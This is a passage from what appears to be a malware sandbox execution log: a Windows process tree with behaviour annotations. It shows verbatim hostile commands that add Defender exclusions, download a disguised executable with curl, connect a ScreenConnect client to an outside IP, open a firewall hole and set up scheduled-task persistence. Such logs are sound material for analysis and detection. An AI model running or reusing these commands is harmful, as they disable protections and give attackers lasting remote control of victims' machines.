    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\hcqi.vbe"
        5⤵
        
        PID:1148
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        6⤵
        
        PID:9172
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:9492
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c koemhx.mp2 vqhshlrdbe.msc
        6⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\koemhx.mp2
        
        koemhx.mp2 vqhshlrdbe.msc
        7⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX1
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbs
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbs
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
        8⤵
        
        PID:7500
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        6⤵
        
        PID:10176
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        7⤵
        Gathers network information
        
        PID:7208
  - - C:\Users\Admin\AppData\Local\Temp\Vltod.exe
      "C:\Users\Admin\AppData\Local\Temp\Vltod.exe"
      4⤵
      PID:6448
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX3\ofqp.vbe"
        5⤵
        
        PID:7864
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        6⤵
        
        PID:9408
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7532
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c wscmnoqdwk.3gp fvpgftw.msc
        6⤵
        
        PID:8836
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\wscmnoqdwk.3gp
        
        wscmnoqdwk.3gp fvpgftw.msc
        7⤵
        
        PID:7192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX3
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbs
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbs
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11272
        
        C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
        8⤵
        
        PID:4072
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        6⤵
        
        PID:9900
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        7⤵
        Gathers network information
        
        PID:9196
  - - C:\Users\Admin\AppData\Local\Temp\XLtod.exe
      "C:\Users\Admin\AppData\Local\Temp\XLtod.exe"
      4⤵
      PID:220
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xtbd.vbe"
        5⤵
        
        PID:4468
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        6⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:4300
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ilrcphdp.jpg daiars.docx
        6⤵
        
        PID:9376
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\ilrcphdp.jpg
        
        ilrcphdp.jpg daiars.docx
        7⤵
        
        PID:10088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX2
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbs
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbs
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbe
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
        8⤵
        
        PID:9904
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        6⤵
        
        PID:10096
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        7⤵
        Gathers network information
        
        PID:3432
- - C:\Users\Admin\AppData\Local\Temp\Files\cheese.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cheese.exe"
    3⤵
    PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7928
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/Realtek%20HD%20Audio%20Manager.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe"
      4⤵
      PID:7236
    - - C:\Windows\system32\curl.exe
        
        curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/Realtek%20HD%20Audio%20Manager.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe"
        5⤵
        
        PID:8324
- - C:\Users\Admin\AppData\Local\Temp\Files\ngownz.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ngownz.exe"
    3⤵
    PID:6248
- - C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
    3⤵
    PID:1860
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FAF.tmp\3FB0.tmp\3FB1.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
      4⤵
      PID:9916
    - - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        5⤵
        Access Token Manipulation: Create Process with Token
        
        PID:8732
      - C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target
        6⤵
        
        PID:7212
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A04D.tmp\A04E.tmp\A04F.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"
        7⤵
        
        PID:12240
- - C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe"
    3⤵
    PID:11720
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Downloads MZ/PE file
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3924
  - - C:\Users\Admin\AppData\Local\Temp\Files\1804Gtwo.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\1804Gtwo.exe"
      4⤵
      Manipulates Digital Signatures
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:5500
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
        5⤵
        Downloads MZ/PE file
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5316
      - C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
        
        "C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe"
        6⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe
        
        "C:\Users\Admin\AppData\Local\Apps\2.0\T5XACY7E.A20\2M530MKQ.TGN\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=37.221.64.46&p=8041&s=d5299a0d-3d6e-49b5-a9fc-6142c65989a9&k=BgIAAACkAABSU0ExAAgAAAEAAQBtRcOmkrgNYslRocOkTkuTyihOpi8jiGU066NYR9jBDXkHxmSQ2YVUm3s8%2fooJYnEhSV7fUNG1B5eE%2bEBaTsdMjuSy6wM5sWHiNov0I%2fCi2R8idtf7h0sRNyUXYU5mv3W%2f%2bAAUF5FVSqznlNh79hYpQ5ibv2AEsvG1v7zIzpVIe9GJKEaCyiMYnNwSkNrJyk7EHRdZqqtnkfYNP7V5qS%2f5EGwD4G1QOOnZh31YJbjAYbQ8GP%2b16XpkKKcCdOuQgGXJcCyDfk7uTR3jzS8ZKuveOcMCrYggcWYA0u%2bjDf3hxmbOoHDVTNrhlpt3R6xZaEcGEohbZJ69mglDgpaukS6e&r=&i=18%2f04%2fG%2ftwo" "1"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:544
  - - C:\Users\Admin\AppData\Local\Temp\Files\444.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\444.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2232
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3676
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:2924
  - - C:\Users\Admin\AppData\Local\Temp\Files\Coc%20Coc.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Coc%20Coc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:1664
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C275.tmp\C276.tmp\C277.bat C:\Users\Admin\AppData\Local\Temp\Files\Coc%20Coc.exe"
        5⤵
        Drops file in Program Files directory
        
        PID:3392
      - C:\Users\Admin\AppData\Roaming\portable_util.exe
        
        portable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1540
        
        C:\Users\Admin\AppData\Roaming\setup.exe
        
        "C:\Users\Admin\AppData\Roaming\setup.exe" --register-coccoc-portable --do-not-create-shortcut
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5712
        
        C:\Users\Admin\AppData\Roaming\setup.exe
        
        C:\Users\Admin\AppData\Roaming\setup.exe --type=crashpad-handler /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CocCoc\Browser\User Data\Crashpad" --url=https://browser-crashes.coccoc.com/cr/report --annotation=channel= --annotation=plat=Win32 "--annotation=prod=Coc Coc" --annotation=ver=114.0.5735.210 --initial-client-data=0x318,0x31c,0x320,0x2f4,0x324,0xfb8088,0xfb8098,0xfb80a4
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4584
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6116
    - - C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:780
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eOO4eKl7j0uG.bat" "
        6⤵
        
        PID:2832
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4528
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4796
        
        C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
        7⤵
        
        PID:6500
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oiIBUmizCj84.bat" "
        8⤵
        
        PID:7032
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:4588
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1540
        
        C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
        9⤵
        
        PID:2864
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bIwSxb6NpwHa.bat" "
        10⤵
        
        PID:2448
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:6528
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1208
        
        C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
        11⤵
        
        PID:2132
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\i6egJYcJ0oiN.bat" "
        12⤵
        
        PID:1428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:3056
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6328
        
        C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
        13⤵
        
        PID:3760
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\grK070yZEji8.bat" "
        14⤵
        
        PID:1604
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:1428
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4576
        
        C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
        15⤵
        
        PID:5460
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0jFa8ekn17JR.bat" "
        16⤵
        
        PID:7280
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:5604
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8900
        
        C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"
        17⤵
        
        PID:7240
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xq76JDkL6Rln.bat" "
        18⤵
        
        PID:10148
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:10400
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7632
  - - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3984
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2368
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1664
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5236
  - - C:\Users\Admin\AppData\Local\Temp\Files\rah.exe
